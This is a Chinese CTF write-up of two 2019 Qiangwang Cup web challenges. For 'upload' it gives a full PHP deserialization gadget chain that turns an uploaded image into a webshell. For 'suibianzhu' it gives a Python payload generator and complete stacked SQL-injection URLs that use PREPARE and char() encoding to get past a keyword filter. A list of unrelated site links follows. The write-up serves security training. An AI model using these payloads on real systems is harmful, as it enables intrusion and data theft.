2019强网杯Web部分Writeup
题记
2019年的强网杯web题目出的都不错,所以对题目进行分析一下。
正文
upload
首先打开界面如下:
有注册和登陆功能!
首先我们注册一个账户,然后登陆,发现可以上传图片:
这里首先想到的就是上传木马,但是经过尝试只能上传图片马,并且不能直接利用,经过抓包发现cookie是序列化内容,所以应该是通过cookie传递序列化内容,经过服务器的反序列化,然后对图片进行重命名操作,进而获得shell:
但是,这种操作是需要源码的,没有源码分析进行反序列化操作,是非常困难的,所以我们进行目录探测发现了www.tar.gz,里面包含源码,并且存在.idea文件,所以直接用phpstorm打开发现断点,可能是出题人故意的吧,不过谁知道呢:),分别是在application/web/controller/Register.php和application/web/controller/Index.php。
application/web/controller/Register.php:
application/web/controller/Index.php:
这两个断点给了我们的几点信息:
Register.php有一个析构方法,可知如果未登录网站进行访问的话,就会调用index的index()方法,而index()方法是一个登陆检测。
index.php会对传入的cookie先进行base64解码,然后对其进行反序列化操作,再把数据拿到数据库进行对比。
仅有以上信息还是不够的,我们的目的是找到对文件名进行重赋值的方法,目前我们还做不到,所以继续审计,可以得到以下三个重要的文件:
web/controller/Index.phpweb/controller/Profile.phpweb/controller/Register.php
public function upload_img(){ if($this->checker){ if(!$this->checker->login_check()){ $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/index"; $this->redirect($curr_url,302); exit(); } } if(!empty($_FILES)){ $this->filename_tmp=$_FILES['upload_file']['tmp_name']; $this->filename=md5($_FILES['upload_file']['name']).".png"; $this->ext_check(); } if($this->ext) { if(getimagesize($this->filename_tmp)){ @copy($this->filename_tmp, $this->filename); @unlink($this->filename_tmp); $this->img="../upload/$this->upload_menu/$this->filename"; $this->update_img();}else{ $this->error('Forbidden type!', url('../index'));} } else{ $this->error('Unknow file type!', url('../index')); } }
其中操作文件行为为:
if(getimagesize($this->filename_tmp)){@copy($this->filename_tmp, $this->filename);@unlink($this->filename_tmp);
我们跟一下跟进$this->filename_tmp和$this->filename发现并没限制,但是有一个阻碍:
if(!empty($_FILES)){ $this->filename_tmp=$_FILES['upload_file']['tmp_name']; $this->filename=md5($_FILES['upload_file']['name']).".png"; $this->ext_check(); }
我们需要绕过这里的判断,我们只需要使用GET请求即可绕过:
if($this->checker){ if(!$this->checker->login_check()){ $curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/index"; $this->redirect($curr_url,302); exit(); }}
上面的判读可以通过直接通过设置类中属性进行bypass,来绕过if判断:
public $checker=0;public $filename_tmp="../public/upload/9c1534b1e8dbb5a0c0ec3f70d24f9627/0d44a7f4f1ae189a4c1d88b83f66ec68.png";public $filename="../public/upload/9c1534b1e8dbb5a0c0ec3f70d24f9627/ethan.php";
文件路径通过以下代码获得:
我们进入第三个if判断:
当该值进入upload_img函数后,接下来就可以利用copy复制出php文件,但是问题是怎么通过反序列化直接调用upload_img函数。
这里我们要用到两个魔术方法:
读取不可访问属性的值时,__get() 会被调用; 在对象中调用一个不可访问方法时,__call() 会被调用。
我们在以下代码中找到这两个魔术方法,分别书写了在调用不可调用方法和不可调用成员变量时怎么做get会直接从except里找,call会调用自身的name成员变量所指代的变量所指代的方法:
public function __get($name){ return $this->except[$name];}public function __call($name, $arguments){ if($this->{$name}){ $this->{$this->{$name}}($arguments); }}
我们知道当对象调用不可访问属性时,就会自动触发get魔法方法,而在对象调用不可访问函数时,就会自动触发call魔法方法。 那么寻找触发方式可以发现文件web/controller/Register.php,关键部分如下:
class Register extends Controller{ public $checker; public $registed; public function __construct() { $this->checker=new Index(); } public function __destruct() { if(!$this->registed){ $this->checker->index(); } }}
我们可以看到checker调用了类Index里的方法index(),如果我们此时将checker的destruct覆盖为类Profile,那么势必在调用index()方法时,会触发call函数,因为check对象的index()方法是在Profile.php中不存在的。
public function __call($name, $arguments)
{
if($this->{$name}){
$this->{$this->{$name}}($arguments);
}
}
而进入该函数后,我们会触发$this->index,成功尝试调用类Profile中不存在的对象,于是可触发__get魔法方法,从而变成return $this->except[‘index’];,那么我们只要在构造序列化时,将except赋值为数组,如下:
public $except=array('index'=>'upload_img');
即可在类Register进行__destruct()时,成功触发upload_img函数,进行文件复制和改名。
以下是我们的攻击链:
Register->__destruct
Profile-> __call
Profile-> __get
Profile-> upload_img()
流程图大概如下:
而我们只需要控制__get的except的值,就可以调用任意方法。
综上所述,我们构造以下代码:
<?php
namespace appwebcontroller;
class Profile
{
public $checker=0;
public $filename_tmp="../public/upload/9c1534b1e8dbb5a0c0ec3f70d24f9627/0d44a7f4f1ae189a4c1d88b83f66ec68.png";
public $filename="../public/upload/9c1534b1e8dbb5a0c0ec3f70d24f9627/ethan.php";
public $upload_menu;
public $ext=1;
public $img;
public $except=array('index'=>'upload_img');
}
class Register
{
public $checker;
public $registed=0;
}
$a=new Register();
$a->checker=new Profile();
$a->checker->checker = 0;
// echo serialize($a);
echo base64_encode(serialize($a));
?>
首先,我们上传一个图片马,然后利用我们得到的payload替换cookie,刷新后即可找到修改后缀后的php文件:
使用蚁剑连接我们的木马,成功拿到shell:
随便注
return preg_match("/select|update|delete|drop|insert|where|./i", $inject);
这里过滤了select和.,所以跨表查询存在难道,因此这里使用堆叠注入和char进行bypass。
exp如下:
payload = "0';set @s=concat(%s);PREPARE a FROM @s;EXECUTE a;"
#exp = 'select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database()'
#exp = "select group_concat(COLUMN_NAME) from information_schema.COLUMNS where TABLE_NAME='1919810931114514'"
exp = "select flag from `1919810931114514`"
res = ''
for i in exp:
res += "char(%s),"%(ord(i))
my_payload = payload%(res[:-1])
print(my_payload)
获取表名:
http://192.168.23.166:8888/?inject=0';set @s=concat(char(115),char(101),char(108),char(101),char(99),char(116),char(32),char(103),char(114),char(111),char(117),char(112),char(95),char(99),char(111),char(110),char(99),char(97),char(116),char(40),char(84),char(65),char(66),char(76),char(69),char(95),char(78),char(65),char(77),char(69),char(41),char(32),char(102),char(114),char(111),char(109),char(32),char(105),char(110),char(102),char(111),char(114),char(109),char(97),char(116),char(105),char(111),char(110),char(95),char(115),char(99),char(104),char(101),char(109),char(97),char(46),char(84),char(65),char(66),char(76),char(69),char(83),char(32),char(119),char(104),char(101),char(114),char(101),char(32),char(84),char(65),char(66),char(76),char(69),char(95),char(83),char(67),char(72),char(69),char(77),char(65),char(61),char(100),char(97),char(116),char(97),char(98),char(97),char(115),char(101),char(40),char(41));PREPARE a FROM @s;EXECUTE a;
获取字段名:
http://192.168.23.166:8888/?inject=0';set @s=concat(char(115),char(101),char(108),char(101),char(99),char(116),char(32),char(103),char(114),char(111),char(117),char(112),char(95),char(99),char(111),char(110),char(99),char(97),char(116),char(40),char(67),char(79),char(76),char(85),char(77),char(78),char(95),char(78),char(65),char(77),char(69),char(41),char(32),char(102),char(114),char(111),char(109),char(32),char(105),char(110),char(102),char(111),char(114),char(109),char(97),char(116),char(105),char(111),char(110),char(95),char(115),char(99),char(104),char(101),char(109),char(97),char(46),char(67),char(79),char(76),char(85),char(77),char(78),char(83),char(32),char(119),char(104),char(101),char(114),char(101),char(32),char(84),char(65),char(66),char(76),char(69),char(95),char(78),char(65),char(77),char(69),char(61),char(39),char(49),char(57),char(49),char(57),char(56),char(49),char(48),char(57),char(51),char(49),char(49),char(49),char(52),char(53),char(49),char(52),char(39));PREPARE a FROM @s;EXECUTE a;
获取flag:
http://192.168.23.166:8888/?inject=0';set @s=concat(char(115),char(101),char(108),char(101),char(99),char(116),char(32),char(102),char(108),char(97),char(103),char(32),char(102),char(114),char(111),char(109),char(32),char(96),char(49),char(57),char(49),char(57),char(56),char(49),char(48),char(57),char(51),char(49),char(49),char(49),char(52),char(53),char(49),char(52),char(96));PREPARE a FROM @s;EXECUTE a;
*本文作者:cck,转载请注明来自FreeBuf.COM
- 使用VBA创建Access数据表
- 新时代已经来临,你做好准备了吗?
- Python自学笔记——多线程微信文章爬取
- 习近平要求加快这项技术发展 与你关系很密切!
- 趴比库获数百万元融资 域名pabiku.com给力十足
- 联袂腾讯 “互联网+税务”创新模式在蒙启动
- 学医11年,终将被机器取代
- 大数据揭示:女性比男性更关注医改 建档等是热门话题
- 腾讯人工智能实验室AI Lab主任张潼博士前沿对话:AI如何助力营销?
- 当前所有源码链接
- Python入门基础连载(4)控制流
- 济西站构建大数据运营网络,打造智能化列车加工厂
- 五位数终端收购的域名dongxiao.cn已启用
- 全球互联网发展进入“拐点”——展望下一代互联网
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- Kubernetes 环境的 Tensorflow Serving on S3
- 数据处理|数据框重铸
- Go mod 常见问题(持续更新)
- R In Action|创建数据集
- R语言进阶之生存分析
- R In Action |基本数据管理
- R|apply,tapply
- python中的基本运算
- 助力联邦——Pulsar在Angel PowerFL联邦学习平台中的应用
- 让数据跃然“图”上!腾讯位置服务数据可视化API正式发布
- 腾讯云 Serverless 衔接 Kafka 上下游数据流转实战
- Tensorflow 测试一段能运行在 GPU 的代码
- Tensorflow on HDFS 的实践
- MPI on Kubernetes
- Tensorflow Serving模型指向s3地址,Could not find base path?